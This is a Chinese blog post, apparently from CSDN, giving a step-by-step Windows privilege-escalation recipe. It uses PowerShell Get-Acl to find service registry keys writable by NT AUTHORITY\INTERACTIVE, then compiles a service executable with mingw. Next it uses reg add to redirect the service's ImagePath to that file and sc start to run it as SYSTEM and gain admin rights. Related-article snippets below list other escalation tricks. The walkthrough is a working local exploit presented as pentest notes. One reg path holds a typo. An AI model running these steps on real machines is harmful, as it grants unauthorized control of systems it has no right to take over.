注册表提权

最新推荐文章于 2023-02-02 15:54:45 发布
最新推荐文章于 2023-02-02 15:54:45 发布
阅读量1.2k 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45682070/article/details/109905181
版权

注册表提权原理:
将一个伪造的服务,通过注册表写入,在开启这个服务,那么伪造的服务就会运行我们的恶意代码(服务是以system权限运行的)

NT AUTHORITY\INTERACTIVE 当前用户的权限,利用他可以完全控制注册表的权限提权(如果配置不当)

powershell
Get-Acl -Path hklm:\System\CurrentControlSet\services\* | select Path,AccessToString |Format-List > 1.txt

在1.txt中查找"NT AUTHORITY\INTERACTIVE",直到找到一个Allow FullControl

powershellGet-Acl -Path hklm:\System\CurrentControlSet\services\a | fl   (a为NT AUTHORITY\INTERACTIVE用户Allow FullControl的服务)
把windows_service.c在kali中编译成exe文件
x86_64-w64-mingw32-gcc windows_service.c -o x.exe
    			
然后放到temp目录下,然后把提升权限的exe路径添加到查出来的服务
reg add HKLM\SYSTEM|CurrentControlSet\services\a /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
添加成功后,运行伪造好的服务:
sc start a
net user 查看已经是admin用户组了
郭晓雷
关注
49-5 内网渗透 - 服务注册表权限脆弱提权
weixin_43263566的博客
06-28 175
Windows操作系统中的注册表存储了每个系统服务的相关条目。注册表使用访问控制列表(ACL)来管理用户对其条目的访问权限。如果注册表的ACL配置不正确,可能导致低权限用户获得对服务注册表的写入权限。攻击者可以利用这一漏洞修改注册表内容,例如修改服务的二进制文件路径(ImagePath键),从而改变服务启动时的行为。
Windows提权---DLL注入/不带引号的服务路径/注册表
qq_40012781的博客
07-03 1064
DLL注入提权、不带引号的服务路径提权注册表提权
注册表提权工具.rar
05-14
因为保密原因经常检查U盘连接,需要清理U盘记录,网上找的清理工具不能清理干净,清理完后USBstor下面还有金士顿等记录在,但无法更改权限,最后在微软官网淘到一个工具可以提权,然后手动清除记录就行,压缩包里有使用说明, 本来想编写个小工具自动清理的,但微软这个工具只是用来临时提权启动regedit的,关闭regedit后权限还是还原了,所以不知道怎么实现自动清理,有知道的请告诉我下
提权【windows提权中敏感目录和敏感注册表的利用】
weixin_33862514的博客
10-31 291
(( windows提权中敏感目录和敏感注册表的利用 ))敏感目录 目录权限 提权用途C:\Program Files\ 默认用户组users对...
操作系统权限提升(八)之系统错误配置-注册表键AlwaysInstall提权
最新发布
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-02 526
注册表键AlwaysInstallElevated是一个策略设置项。windows允许低权限用户以System权限运行安装文件。如果启用此策略设置项,那么任何权限用户都能以NT AUTHORITY\SYSTEM权限来安装恶意的MSI(Microsoft Windows Installer)文件。
操作系统权限提升(七)之系统错误配置-不安全注册表提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-01 697
Windows的服务路径存储在Windows的注册表中,若注册表配置不当,当攻击者可以发现使用低权限可以更改注册表的选项的时候,就可以导致提权,可以将 imagepath 修改成恶意的文件,重启导致提权
提权工具
p656456564545的专栏
12-30 3231
Churraskito利用工具:     Windows管理规范(WMI)提供程序没有正确地隔离NetworkService或LocalService帐号下运行的进程,同一帐号下运行的两个独立进程可以完全访问对方的文件句柄、注册表项等资源。WMI提供程序主机进程在某些情况下会持有SYSTEM令牌,如果攻击者可以以 NetworkService或LocalService帐号访问计算机,攻击者就可以
windows账户提权 API.zip
01-22
7. **如何编程实现 注册表提权 提升administrator为SYSTEM** - 提权可能包括对注册表的修改,因为注册表中存储了许多系统设置和权限信息。文件可能阐述了如何使用API(如`RegSetValueEx`)来更改注册表键,从而...
windows服务器安全设置之提权
09-30
在网络服务中,提权攻击通常涉及到 NETWORK SERVICE 账号,以及系统注册表的修改。对于这类攻击,一种防范措施就是将注册表的相关部分设置为只读,限制恶意更改。下面详细说明涉及的安全知识点。 网络安全是一个...
vc++高级班之注册表篇[5]---提权打开SAM子键
飞叶如刀
03-24 2115
①、普通方式打开 SAM 子键: HKEY hKey = NULL; TCHAR *lpszSubKey = _T("SAM\\SAM\\Domains"); LONG lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpszSubKey, 0, KEY_ALL_ACCESS, &hKey); if (lRet == ERROR_SUCCESS) { Me
注册表权限工具 115项注册表设置器
08-28
注 册 表 权 限 工 具 1 1 5 项 注 册 表 设 置 器
windows系统提权工具.zip
12-25
windows7,windows2003等系统的提权工具,psexec.exe程序可以实现windows7和2003的提权,whoami可以在win7上查看当前用户,pinjector是一个进程注入工具,procexp是一个手动查杀病毒的工具可以用来找到被进程注入的进程。
常见的注册表工具.rar
05-21
上次 自己整理电脑,花了很长时间,才弄到的,现在给大家分享一下!!!
windows下的 Nsudo提权工具,支持system权限
02-05
类似Linux下的 sudo 命令的一款windows下工具,支持任意权限提权和令牌,包括system账户,附带命令行工具和源代码
内网渗透笔记——注册表自启动与msi提权
wang_zui_zui的博客
02-24 4874
目的:进行持久化的连接 最简单的自启动: 自启动文件夹:开始➡程序➡启动(win7下) 除了通过文件夹,还可以利用Windows配置文件: win.ini、system.ini、wininit.ini等等,加载一些自动运行的程序 如果打开win.ini文件,文件中有[windows]字段,后跟Run=文件路径 LOAD=文件路径,就是我们要自启动的东西,但如果本身没有[windows]字段,手动去添加的话一般都是失败的 [windows] Run=正常运行 LOAD=启动后自动最小化运行
Win10 - 注册表获取权限的方法
热门推荐
袭冷
02-07 2万+
一、问题说明 在Win10系统中,有时涉及到一些注册表项、数值修改,如果该注册表项是属于系统的,那么使用本地管理员是没有权限的,但可以通过更改注册表所有者的方法来获得权限,从而顺利修改。 二、更改步骤 1、在对应注册表项如ShellFolder上点击右键,选择“权限”,这时会打开“ShellFolder的权限”窗口。如图: ...
C++ 注册表编程(包含权限的提升)
积累点滴,保持自我
07-19 4292
C++ 注册表编程 1.基础知识 注册表的组织方式跟文件目录比较相似,主要分为根键、子键和键值项三部分,与文件目录对应的话就是根目录、子目录和文件。分别介绍一下这三部分: (1)根键。分为5个,分别为     HKEY_CLASSES_ROOT     HKEY_CURRENT_USER     HKEY_LOCAL_MACHINE     HKEY_USERS和HKEY_CURRE...
域环境提权、编辑注册表
zkwniky的博客
09-20 1121
Token(令牌),域环境中提权 用户每次登录时,账号绑定临时的token; 访问资源时提交token进行身份验证,类似于web cookie。 Delegate Token:交互会话登录,(例如直接登录、远程桌面登录) Impersonate Token:非交互登录,(例如访问文件共享) 注意:在域环境中,Delegate Token账号注销后变成Impersonate Token
Windows提权技术详解
对于特定的系统目录和注册表键,如Program Files、Windows目录以及某些关键的注册表项,攻击者可能会利用它们来执行提权操作。 第二章 提权实例 本章提供了多个具体的提权案例,涵盖了各种环境和情况,如Web服务器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值